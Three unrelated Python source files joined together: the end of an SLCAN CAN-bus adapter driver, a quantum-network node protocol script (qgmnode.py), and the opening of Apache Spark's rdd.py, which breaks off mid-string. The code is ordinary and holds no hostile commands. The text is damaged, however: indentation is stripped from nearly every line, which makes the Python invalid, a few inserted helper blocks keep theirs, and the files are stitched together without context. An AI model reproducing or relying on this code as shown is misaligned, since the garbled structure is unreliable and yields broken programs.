max_estimated_rx_delay_to_resync = max_estimated_rx_delay_to_resync or DEFAULT_MAX_ESTIMATED_RX_DELAY_TO_RESYNC
ts_estimator_mono = TimestampEstimator(max_rate_error=max_adapter_clock_rate_error,
source_clock_overflow_period=TIMESTAMP_OVERFLOW_PERIOD,
fixed_delay=fixed_rx_delay,
max_phase_error_to_resync=max_estimated_rx_delay_to_resync)
ts_estimator_real = copy.deepcopy(ts_estimator_mono)
#
# Preparing the RX thread
#
should_exit = False
def rx_thread_wrapper():
rx_worker = RxWorker(conn=conn,
rx_queue=rx_queue,
ts_estimator_mono=ts_estimator_mono,
ts_estimator_real=ts_estimator_real,
termination_condition=lambda: should_exit)
try:
rx_worker.run()
except Exception as ex:
logger.error('RX thread failed, exiting', exc_info=True)
# Propagating the exception to the parent process
rx_queue.put(ex)
rxthd = threading.Thread(target=rx_thread_wrapper, name='slcan_rx')
rxthd.daemon = True
try:
conn = serial.Serial(device, baudrate or DEFAULT_BAUDRATE)
except Exception as ex:
logger.error('Could not open port', exc_info=True)
rx_queue.put(ex)
return
#
# Actual work is here
#
try:
_init_adapter(conn, bitrate)
rxthd.start()
logger.info('IO process initialization complete')
rx_queue.put(IPC_SIGNAL_INIT_OK)
tx_worker = TxWorker(conn=conn,
rx_queue=rx_queue,
tx_queue=tx_queue,
termination_condition=lambda: (should_exit or
not rxthd.is_alive() or
not is_parent_process_alive()))
tx_worker.run()
except Exception as ex:
logger.error('IO process failed', exc_info=True)
rx_queue.put(ex)
finally:
logger.info('IO process is terminating...')
should_exit = True
if rxthd.is_alive():
rxthd.join()
_stop_adapter(conn)
conn.close()
logger.info('IO process is now ready to die, goodbye')
#
# Logic of the main process
#
class SLCAN(AbstractDriver):
"""
Driver for SLCAN-compatible CAN bus adapters, with extension to support CLI commands.
Some info on SLCAN can be found here:
- Linux tree: drivers/net/can/slcan.c (http://lxr.free-electrons.com/source/drivers/net/can/slcan.c)
- https://files.zubax.com/docs/Generic_SLCAN_API.pdf
- http://www.can232.com/docs/canusb_manual.pdf
- http://www.fischl.de/usbtin/
    The CLI extension allows executing arbitrary CLI commands on the adapter. The commands differ from regular SLCAN
exchange in the following ways:
- CLI commands are echoed back.
- Every output line of a CLI command, including echo, is terminated with CR LF (\r\n).
- After the last line follows the ASCII End Of Text character (ETX, ^C, ASCII code 0x03) on a separate
line (terminated with CR LF).
- CLI commands must not begin with whitespace characters.
Example:
Input command "stat\r\n" may produce the following output lines:
- Echo: "stat\r\n"
- Data: "First line\r\n", "Second line\r\n", ...
- End Of Text marker: "\x03\r\n"
Refer to https://kb.zubax.com for more info.
"""
def __init__(self, device_name, **kwargs):
if not serial:
raise RuntimeError("PySerial not imported; SLCAN is not available. Please install PySerial.")
super(SLCAN, self).__init__()
self._stopping = False
self._rx_queue = multiprocessing.Queue(maxsize=RX_QUEUE_SIZE)
self._tx_queue = multiprocessing.Queue(maxsize=TX_QUEUE_SIZE)
self._log_queue = multiprocessing.Queue()
self._cli_command_requests = [] # List of tuples: (command, callback)
# https://docs.python.org/3/howto/logging-cookbook.html
self._logging_thread = threading.Thread(target=self._logging_proxy_loop, name='slcan_log_proxy')
self._logging_thread.daemon = True
# Removing all unused stuff, because it breaks inter process communications.
kwargs = copy.copy(kwargs)
keep_keys = inspect.getargspec(_io_process).args
for key in list(kwargs.keys()):
if key not in keep_keys:
del kwargs[key]
kwargs['rx_queue'] = self._rx_queue
kwargs['tx_queue'] = self._tx_queue
kwargs['log_queue'] = self._log_queue
kwargs['parent_pid'] = os.getpid()
self._proc = multiprocessing.Process(target=_io_process, name='slcan_io_process',
args=(device_name,), kwargs=kwargs)
self._proc.daemon = True
self._proc.start()
# The logging thread should be started immediately AFTER the IO process is started
self._logging_thread.start()
deadline = time.monotonic() + IO_PROCESS_INIT_TIMEOUT
while True:
try:
sig = self._rx_queue.get(timeout=IO_PROCESS_INIT_TIMEOUT)
if sig == IPC_SIGNAL_INIT_OK:
break
if isinstance(sig, Exception):
self._tx_queue.put(IPC_COMMAND_STOP, timeout=IO_PROCESS_INIT_TIMEOUT)
raise sig
except queue.Empty:
pass
if time.monotonic() > deadline:
self._tx_queue.put(IPC_COMMAND_STOP, timeout=IO_PROCESS_INIT_TIMEOUT)
raise DriverError('IO process did not confirm initialization')
self._check_alive()
# noinspection PyBroadException
def _logging_proxy_loop(self):
while self._proc.is_alive() and not self._stopping:
try:
try:
record = self._log_queue.get(timeout=0.5)
except queue.Empty:
continue
getLogger(record.name).handle(record)
except Exception as ex:
try:
print('SLCAN logging proxy failed:', ex, file=sys.stderr)
except Exception:
pass
logger.info('Logging proxy thread is stopping')
def close(self):
if self._proc.is_alive():
self._tx_queue.put(IPC_COMMAND_STOP)
self._proc.join(10)
            # Sometimes the child process gets stuck at exit; this is a workaround
if self._proc.is_alive() or self._proc.exitcode is None:
logger.warning('IO process refused to exit and will be terminated')
try:
self._proc.terminate()
except Exception as ex:
logger.error('Failed to terminate the IO process [%r]', ex, exc_info=True)
try:
if self._proc.is_alive():
logger.error('IO process refused to terminate, escalating to SIGKILL')
import signal
os.kill(self._proc.pid, signal.SIGKILL)
except Exception as ex:
logger.critical('Failed to kill the IO process [%r]', ex, exc_info=True)
self._stopping = True
self._logging_thread.join()
def __del__(self):
self.close()
def _check_alive(self):
if not self._proc.is_alive():
raise DriverError('IO process is dead :(')
def receive(self, timeout=None):
self._check_alive()
if timeout is None:
deadline = None
elif timeout == 0:
deadline = 0
else:
deadline = time.monotonic() + timeout
while True:
# Blockingly reading the queue
try:
if deadline is None:
get_timeout = None
elif deadline == 0:
# TODO this is a workaround. Zero timeout causes the IPC queue to ALWAYS throw queue.Empty!
get_timeout = 1e-3
else:
# TODO this is a workaround. Zero timeout causes the IPC queue to ALWAYS throw queue.Empty!
get_timeout = max(1e-3, deadline - time.monotonic())
obj = self._rx_queue.get(timeout=get_timeout)
except queue.Empty:
return
# Handling the received thing
if isinstance(obj, CANFrame):
self._rx_hook(obj)
return obj
elif isinstance(obj, Exception): # Propagating exceptions from the IO process to the main process
raise obj
elif isinstance(obj, IPCCommandLineExecutionResponse):
while len(self._cli_command_requests):
(stored_command, stored_callback), self._cli_command_requests = \
self._cli_command_requests[0], self._cli_command_requests[1:]
if stored_command == obj.command:
stored_callback(obj)
break
else:
logger.error('Mismatched CLI response: expected %r, got %r', stored_command, obj.command)
else:
raise DriverError('Unexpected entity in IPC channel: %r' % obj)
# Termination condition
if deadline == 0:
break
elif deadline is not None:
if time.monotonic() >= deadline:
return
def send(self, message_id, message, extended=False):
self._check_alive()
frame = CANFrame(message_id, message, extended)
try:
self._tx_queue.put_nowait(frame)
except queue.Full:
raise TxQueueFullError()
self._tx_hook(frame)
def execute_cli_command(self, command, callback, timeout=None):
"""
Executes an arbitrary CLI command on the SLCAN adapter, assuming that the adapter supports CLI commands.
        The callback will be invoked from the method receive(), using the same thread.
If the command times out, the callback will be invoked anyway, with 'expired' flag set.
Args:
command: Command as unicode string or bytes
callback: A callable that accepts one argument.
The argument is an instance of IPCCommandLineExecutionResponse
timeout: Timeout in seconds. None to use default timeout.
"""
self._check_alive()
request = IPCCommandLineExecutionRequest(command, timeout)
try:
self._tx_queue.put(request, timeout=timeout)
except queue.Full:
raise TxQueueFullError()
# The command could be modified by the IPCCommandLineExecutionRequest
self._cli_command_requests.append((request.command, callback))
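# A minimal usage sketch (not part of the original driver) for the CLI extension described
# in the SLCAN docstring above. The device path and the helper name _example_run_cli_command
# are hypothetical, introduced only for illustration; because the callback is delivered from
# receive(), the caller must keep pumping receive() until it fires.
def _example_run_cli_command(device='/dev/ttyACM0', command='stat', timeout=2.0):
    responses = []
    driver = SLCAN(device, bitrate=DEFAULT_BITRATE)
    try:
        driver.execute_cli_command(command, responses.append, timeout=timeout)
        deadline = time.monotonic() + timeout
        while not responses and time.monotonic() < deadline:
            # Any CAN frames returned here are discarded; a real caller would handle them
            driver.receive(timeout=0.1)
        return responses[0] if responses else None
    finally:
        driver.close()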
|
qgmnode.py
|
from bitarray import bitarray
from random import *
from time import sleep
from threading import Thread
import sys
from cqc.pythonLib import *
from protocol import *
from utils import *
##############################
#
# QGMNode class derived from CQCConnection, with reg* attributes
#
class QGMNode():
def __init__(self, myid, d, p, n):
self.myid = myid
self.myself = 'node'+str(myid)
self.d = d
self.p = p
self.n = n
self.indexes = {}
# Number of child nodes that responded to having finished STEP1
self.numChildAnsw = 0
# Flag to establish when STEP1 has been terminated with all the nodes involved
self.step1Terminated = 0
# Flag to determine when to execute STEP1 as a parent node
self.startStep1AsParent = 0
# Flag to determine when the parent node can start STEP1 with the right child node
self.step1rightChild = 0
# Flag to determine if a local violation can be notified
self.notifyFlag = 1
# Flag to determine if there are pending local violations that have yet to be resolved
self.pendingViolation = 0
# Bit registers for local state and global state
self.regVLocal = bitarray(d)
self.regVGlobal = bitarray(d)
# Dictionary for node identifiers
self.identifiers = {'parent':'unknown', 'leftChild':'unknown', 'rightChild':'unknown'}
self.state = {}
# If the node is different from the root node, it calculates the parent node id
if (myid != 0):
idp = 0
if (myid%2 == 0):
idp = int((myid - 2)/2)
elif (myid%2 == 1):
idp = int((myid - 1)/2)
# sets the identifier of the parent node
self.identifiers['parent'] = 'node'+str(idp)
# sets the parent node in the READY state
self.state[self.identifiers['parent']] = 'READY'
else:
self.identifiers['parent'] = 'null'
# Sets the name of the two child nodes
self.identifiers['leftChild'] = 'node'+str(myid*2+1)
self.identifiers['rightChild'] = 'node'+str(myid*2+2)
# List of indexes for the parent node and the two child nodes
self.indexes[self.identifiers['parent']] = []
self.indexes[self.identifiers['leftChild']] = []
self.indexes[self.identifiers['rightChild']] = []
# Sets the two child nodes in the READY state
self.state = {}
self.state[self.identifiers['leftChild']] = 'READY'
self.state[self.identifiers['rightChild']] = 'READY'
# Creates qubit registers for EPR pairs shared with child nodes
self.regA = {}
self.regA[self.identifiers['leftChild']] = [] # for the qubits that the node shares (entangled) with his left child
self.regA[self.identifiers['rightChild']] = [] # for the qubits that the node shares (entangled) with his right child
self.regAB = {}
self.regAB[self.identifiers['leftChild']] = [] # for the qubits that arrive from the left child
self.regAB[self.identifiers['rightChild']] = [] # for the qubits that arrive from the right child
# Creates qubit registers for EPR pairs shared with the parent node
self.regB = {}
self.regBA = {}
self.regB[self.identifiers['parent']] = []
self.regBA[self.identifiers['parent']] = []
# Initialize the CQC connection
with CQCConnection(self.myself) as self.node:
# If the node is not the root node (node0), it starts a local processing thread
if (myid != 0):
self.startLocalProcessing()
            # Start the listening loop
self.listen()
###################################
#
# method for starting the local processing loop in a separate thread
#
def startLocalProcessing(self):
tProc = Thread(target=self.localProcessing, args=())
tProc.start()
###################################
#
# processing loop
#
def localProcessing(self):
# Initialize to 0 the bit register for the local state
i = 0
while i < self.d:
self.regVLocal[i] = 0
i = i+1
# Waits to execute STEP1 with the parent node
waitLoop = True
while waitLoop:
if (self.startStep1AsParent):
waitLoop = False
# If it has child nodes, send a classic message to the left child node to tell it to start STEP1
if (self.myid*2+2 < self.n):
self.state[self.identifiers['leftChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['leftChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['leftChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":start_step1"))
# Waits until STEP1 finishes with the left child node
waitLoop = True
while waitLoop:
if (self.step1rightChild):
waitLoop = False
# STEP1 starts with the right child node
self.state[self.identifiers['rightChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['rightChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['rightChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":start_step1"))
# Waits until STEP1 finishes with the right child node
waitLoop = True
while waitLoop:
if (self.numChildAnsw == 2):
waitLoop = False
self.numChildAnsw = 0
# Notifies the two child nodes that STEP1 has been terminated with both
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":step1_terminated"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":step1_terminated"))
# Main loop
while True:
to_print = "## [localProcessing] Child {}: current state is {}".format(self.node.name, self.state[self.identifiers['parent']])
print(to_print)
            # If the parent node is in the PROC state, sleep for a random interval, double-check that it is still in the PROC state,
            # and finally flip some bits of the local-state register at random
if (self.state[self.identifiers['parent']] == 'PROC'):
if (self.pendingViolation == 0):
wt = random()*60
time.sleep(wt)
else:
time.sleep(3)
if (self.state[self.identifiers['parent']] == 'PROC'): # re-check
                    # Check whether a previous local violation has not yet been notified.
                    # If there is none, proceed normally; otherwise handle the pending one.
if (self.pendingViolation == 0):
                        # Iterate over every bit of the register and flip it only when the random value is less than p
i = 0
flag = 0
while i < self.d:
r = random()
if r < self.p:
if self.regVLocal[i] == 1:
self.regVLocal[i] = 0
elif self.regVLocal[i] == 0:
self.regVLocal[i] = 1
flag = 1
i = i+1
# If at least one bit has changed it means that there has been a local violation
if flag == 1:
                            # Check whether the local violation can be notified
if (self.notifyFlag):
# Notifies the two child nodes (if they exist) to pause communication with the parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":pause"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":pause"))
to_print = "## PROC ## Child {}: new local state after local violation: {}".format(self.node.name, self.regVLocal)
print(to_print)
# Notifies the parent node of the local violation by sending it a classic message
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":child_violation"))
# Updates the Bell pair and sends the modified qubits to the parent node starting the protocol STEP2
self.state[self.identifiers['parent']] = 'STEP2'
del self.indexes[self.identifiers['parent']][:] # perform some cleaning
childStep2(self.node, self.identifiers['parent'], self.regVLocal, self.regB, self.regBA, self.d, self.indexes[self.identifiers['parent']])
else:
self.pendingViolation = 1
to_print = "## PROC ## Child {}: local violation occurred but cannot notify now: {}".format(self.node.name, self.regVLocal)
print(to_print)
else:
# Manages the pending local violation
# Checks if can notify the local violation
if (self.notifyFlag):
# Notifies the two child nodes (if they exist) to pause communication with the parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":pause"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":pause"))
to_print = "## PROC ## Child {}: handling the pending local violation occurred before: {}".format(self.node.name, self.regVLocal)
print(to_print)
# Notifies the parent node of the local violation by sending it a classic message
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":child_violation"))
# Updates the Bell pair and sends the modified qubits to the parent node starting the protocol STEP2
self.state[self.identifiers['parent']] = 'STEP2'
del self.indexes[self.identifiers['parent']][:] # perform some cleaning
childStep2(self.node, self.identifiers['parent'], self.regVLocal, self.regB, self.regBA, self.d, self.indexes[self.identifiers['parent']])
# If the node status is not in PROC, wait until it returns in that state
elif (self.state[self.identifiers['parent']] != 'PROC'):
wt = 10
time.sleep(wt)
##############################################
#
# listening loop (starting message handling in a separate thread)
#
def listen(self):
# Initialize to 0 the bit register for the global state
i = 0
while i < self.d:
self.regVGlobal[i] = 0
i = i+1
# STEP1 management only for the root node
if (self.myid == 0):
# Left child node
self.state[self.identifiers['leftChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['leftChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['leftChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":start_step1"))
data = self.node.recvClassical()
content = data.decode().split(":")
sender = content[0]
msg = content[1]
to_print = "App {}: received message '{}' from: {}".format(self.node.name, msg, sender)
print(to_print)
# Right child node
self.state[self.identifiers['rightChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['rightChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['rightChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":start_step1"))
# Waits to receive the response from the right child node
data = self.node.recvClassical()
content = data.decode().split(":")
sender = content[0]
msg = content[1]
to_print = "App {}: received message '{}' from: {}".format(self.node.name, msg, sender)
print(to_print)
# Notifies both child nodes that STEP1 is terminated
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":step1_terminated"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":step1_terminated"))
# Waits to receive a classic message, after which it handles it in a dedicated thread
while True:
data = self.node.recvClassical()
content = data.decode().split(":")
sender = content[0]
msg = content[1]
to_print = "App {}: received message '{}' from: {}".format(self.node.name, msg, sender)
print(to_print)
# Checks the type of the received message
if (msg == "start_step1"):
self.state[self.identifiers['parent']] = 'STEP1'
tComm = Thread(target=self.commHandler, args=(sender, self.regB, self.regBA))
tComm.start()
elif (msg == "end_step1"):
self.step1rightChild = 1
self.numChildAnsw += 1
elif (msg == "step1_terminated"):
self.step1Terminated = 1
elif (msg == "pause"):
self.notifyFlag = 0
elif (msg == "restart"):
self.notifyFlag = 1
elif (msg == "child_violation"):
                # When it receives a violation notification from a child node, the parent node tells
                # its own parent that it is engaged in the protocol with its children, and then starts it
self.notifyFlag = 0 # the parent node suspends the communication of a possible local violation
if (self.myid != 0): # check that the parent node is not the root
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":start_busy"))
tComm = Thread(target=self.commHandler, args=(sender, self.regA, self.regAB))
tComm.start()
elif (msg == "start_busy"):
                # If it receives a busy message from a child node, it tells the other child node that
                # it momentarily cannot serve it, should that node suffer a local violation
otherChild = 'temp'
if (sender == self.identifiers['leftChild']):
otherChild = self.identifiers['rightChild']
else:
otherChild = self.identifiers['leftChild']
self.node.sendClassical(otherChild, str.encode(self.myself+":pause"))
elif (msg == "end_busy"):
otherChild = 'temp'
if (sender == self.identifiers['leftChild']):
otherChild = self.identifiers['rightChild']
else:
otherChild = self.identifiers['leftChild']
self.node.sendClassical(otherChild, str.encode(self.myself+":restart"))
else:
# Starts a new thread to handle the communication, if the message was sent
# from the parent node it passes the regB registers and regBA, otherwise regA and regAB
if (sender == self.identifiers['parent']):
tComm = Thread(target=self.commHandler, args=(sender, self.regB, self.regBA))
else:
tComm = Thread(target=self.commHandler, args=(sender, self.regA, self.regAB))
tComm.start()
###################################
#
# handler for messages coming from any node
#
def commHandler(self, sender, reg1, reg2):
#to_print = "commHandler - message sender is: {}".format(sender)
#print(to_print)
# Actions of the child node
if (sender == self.identifiers['parent']):
if (self.state[sender] == 'STEP1'):
childStep1(self.node, self.identifiers['parent'], reg1, reg2, self.d)
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":end_step1"))
# Waits for the parent node to know that it has finished STEP1 with all its child nodes
waitLoop = True
while waitLoop:
if (self.step1Terminated):
waitLoop = False
self.startStep1AsParent = 1
self.state[sender] = 'PROC'
elif (self.state[sender] == 'PROC'):
self.state[sender] = 'WAIT'
to_print = "#### Child {}: forced to {} by {}".format(self.node.name, self.state[sender], sender)
print(to_print)
# Communicate to its two child nodes (if they exist) that it is busy synchronizing with its parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":pause"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":pause"))
elif (self.state[sender] == 'WAIT'):
# Update the Bell pairs and send changed qubits to parent
self.state[sender] = 'STEP2'
del self.indexes[self.identifiers['parent']][:] # perform some cleaning
childStep2(self.node, self.identifiers['parent'], self.regVLocal, self.regB, self.regBA, self.d, self.indexes[self.identifiers['parent']])
elif (self.state[sender] == 'STEP2'):
self.state[sender] = 'STEP3'
childStep3(self.node, sender, reg1, reg2, self.d, self.indexes[self.identifiers['parent']])
self.state[sender] = 'STEP4'
childStep4(self.node, sender, self.regVGlobal, reg1, reg2, self.d)
elif (self.state[sender] == 'STEP4'):
to_print = "#### Child {}: end protocol notified by {}".format(self.node.name, sender)
print(to_print)
# Communicates to its two child nodes (if they exist) that can resume communication with the parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":restart"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":restart"))
self.state[sender] = 'PROC'
# Actions of the parent node
else:
# Establishes who is the brother node of the one who sent a message to the parent node
otherChild = 'temp'
if (sender == self.identifiers['leftChild']):
otherChild = self.identifiers['rightChild']
else:
otherChild = self.identifiers['leftChild']
if (self.state[sender] == 'WAIT'):
# Sends a classic message to the other child node to force it into the WAIT state (assuming it is in the PROC state)
self.node.sendClassical(otherChild, str.encode(self.myself+":wait"))
# Starts the parentStep2 with the child node that has notified a local violation
self.state[sender] = 'STEP2'
del self.indexes[sender][:] # perform some cleaning
parentStep2(self.node, sender, reg2, self.d, self.indexes[sender])
# Sends a classic message to the other child node to force it into the STEP2 state (assuming it is in the WAIT state)
self.node.sendClassical(otherChild, str.encode(self.myself+":step2"))
# Starts the parentStep2 with the other child node
self.state[otherChild] = 'STEP2'
del self.indexes[otherChild][:] # perform some cleaning
parentStep2(self.node, otherChild, reg2, self.d, self.indexes[otherChild])
# Updates the global registry
time.sleep(2)
to_print = "## 3 ## Parent {}: updating regVGlobal".format(self.node.name)
print(to_print)
# Perform Bell state discrimination by nondestructive measurement
# on the local Bell pairs (whose indexes have been saved)
print("Indexes size: {}".format(len(self.indexes[sender])))
regSender = bitarray(self.d)
regOtherChild = bitarray(self.d)
i = 0
while i < (self.d)/2:
# Measures the qubits of the child node that had the local violation
aq1_sender = qubit(self.node)
aq2_sender = qubit(self.node)
nondestructiveBellStateDiscrimination(reg1[sender][i], reg2[sender][i], aq1_sender, aq2_sender)
b1_sender = aq1_sender.measure()
b2_sender = aq2_sender.measure()
regSender[i*2] = b1_sender
regSender[i*2+1] = b2_sender
# Measures the qubits of the other child node
aq1_otherChild = qubit(self.node)
aq2_otherChild = qubit(self.node)
nondestructiveBellStateDiscrimination(reg1[otherChild][i], reg2[otherChild][i], aq1_otherChild, aq2_otherChild)
b1_otherChild = aq1_otherChild.measure()
b2_otherChild = aq2_otherChild.measure()
regOtherChild[i*2] = b1_otherChild
regOtherChild[i*2+1] = b2_otherChild
to_print = "App {}: nbsd of {} --> i, b1, b2: {}, {}, {}".format(self.node.name,sender,i,b1_sender,b2_sender)
print(to_print)
to_print = "App {}: nbsd of {} --> i, b1, b2: {}, {}, {}".format(self.node.name,otherChild,i,b1_otherChild,b2_otherChild)
print(to_print)
i = i+1
# Calculates the new global state from the average of the local states of the two child nodes
avgIntLocalStates = int((int(regSender.to01(),2) + int(regOtherChild.to01(),2))/2)
avgBitLocalStates = bin(avgIntLocalStates)[2:].zfill(self.d)
avgBitLocalStatesList = [int(i) for i in str(avgBitLocalStates)]
i = 0
while i < self.d:
self.regVGlobal[i] = avgBitLocalStatesList[i];
i = i+1
# Print the new v(t)
print("New Global State: {}".format(self.regVGlobal))
time.sleep(3)
# Starts parentStep3 and parentStep4 with each child node (first one, then the other)
# Current child node
self.state[sender] = 'STEP3'
self.node.sendClassical(sender, str.encode(self.myself+":step3")) # wake up sender to STEP3
parentStep3(self.node, sender, self.regVGlobal, reg1, reg2, self.d, self.indexes[sender])
self.state[sender] = 'STEP4'
parentStep4(self.node, sender, reg1, reg2, self.d)
self.state[sender] = 'WAIT'
time.sleep(2)
# Other child node
self.state[otherChild] = 'STEP3'
self.node.sendClassical(otherChild, str.encode(self.myself+":step3")) # wake up other child to STEP3
parentStep3(self.node, otherChild, self.regVGlobal, reg1, reg2, self.d, self.indexes[otherChild])
self.state[otherChild] = 'STEP4'
parentStep4(self.node, otherChild, reg1, reg2, self.d)
self.state[otherChild] = 'WAIT'
# Notifies the end of the protocol to the child nodes and to the parent node
self.node.sendClassical(sender, str.encode(self.node.name+":protocol_terminated"))
self.node.sendClassical(otherChild, str.encode(self.node.name+":protocol_terminated"))
# If it is not the root node (node0) it tells its parent node that it is no longer engaged
if (self.myself != "node0"):
self.node.sendClassical(self.identifiers['parent'], str.encode(self.node.name+":end_busy"))
self.notifyFlag = 1
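##############################
#
# A small illustration (not part of the original module) of the implicit binary-tree
# numbering used in QGMNode.__init__: node i has children 2*i+1 and 2*i+2, and its parent
# is (i-1)//2 for odd i and (i-2)//2 for even i, which reduces to (i-1)//2 for every i > 0.
# The helper names below are hypothetical and introduced here for illustration only.
#
def _tree_parent(i):
    return (i - 1) // 2 if i > 0 else None

def _tree_children(i, n):
    return [c for c in (2 * i + 1, 2 * i + 2) if c < n]

# For the default n = 7 this reproduces the identifiers built in __init__,
# e.g. _tree_parent(5) == 2 and _tree_children(0, 7) == [1, 2].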
##############################
#
# main
#
def main():
print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
# Node id
myid = int(sys.argv[1])
# Probability of local violation
p = round(float(sys.argv[2]),1)
# d value
d = 4
# Number of nodes
n = 7
qgmnode = QGMNode(myid, d, p, n)
print(qgmnode.identifiers)
##############################
main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
    The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
    A bounded value is generated by an approximate job, with a confidence level
    plus low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
    # The RDD materialization time is unpredictable; if we set a timeout for the socket read
    # operation, it will very likely fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sock.makefile("rb", 65536))
def ignore_unicode_prefix(f):
"""
    Ignore the 'u' prefix of strings in doc tests, to make them work
    in both Python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
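    # Calling the partitioner maps a key to a partition index in [0, numPartitions).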
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
